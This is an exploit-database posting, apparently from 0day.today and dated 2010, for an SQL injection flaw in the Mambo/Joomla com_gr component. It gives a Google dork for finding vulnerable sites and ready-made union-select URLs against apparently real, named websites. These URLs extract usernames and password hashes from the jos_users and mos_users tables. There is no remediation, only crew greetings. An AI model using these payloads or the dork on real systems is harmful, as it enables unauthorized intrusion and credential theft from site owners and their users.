id: 13778
date: 08/22/2010
title: Mambo / Joomla Component com_gr SQL Injection Vulnerability
author: _aL_bayraqim_
cves: 

===========================================================
Mambo / Joomla Component com_gr SQL Injection Vulnerability
===========================================================


Author :   _aL_Bayraqim_  
   
Homepage : http://www.1923turk.com

..! _al_bayragim_ ..! ..! Corti ..! ..! Aytug_Han ..! ..! Montesque ..! ..! Em3rGeNcY ..!...!..KaraBulut....!
   
=================================================== 
[+]G00gle Dork :index.php?option=com_gr

[+] Vulnerable File :
   
   
http://www.ameixoeiradigital.com//index.php?option=com_gr&task=area&tipo=1&Itemid=26&area=1[SQL]  

   
[+] ExploiT : 
   
http://www.ameixoeiradigital.com//index.php?option=com_gr&task=area&tipo=1&Itemid=26&area=1+order+by+2--
  

http://www.ameixoeiradigital.com//index.php?option=com_gr&task=area&tipo=1&Itemid=26&area=1+union+select+1,2-- 
 
 
http://www.ameixoeiradigital.com//index.php?option=com_gr&task=area&tipo=1&Itemid=26&area=1+union+select+1,concat(username,0x3a,password)+from+jos_users--  
[+]

Mambo Component (com_gr) SQL Injection Vulnerability 

http://www.altadelisboadigital.com//index.php?option=com_gr&task=area&tipo=2&Itemid=28&area=-1+union+select+1,concat(username,0x3a,password)+from+mos_users--
=================================================== 

===================================================  
   
Greetz : 1923Turk All Users 



#  0day.today [2023-03-23]  #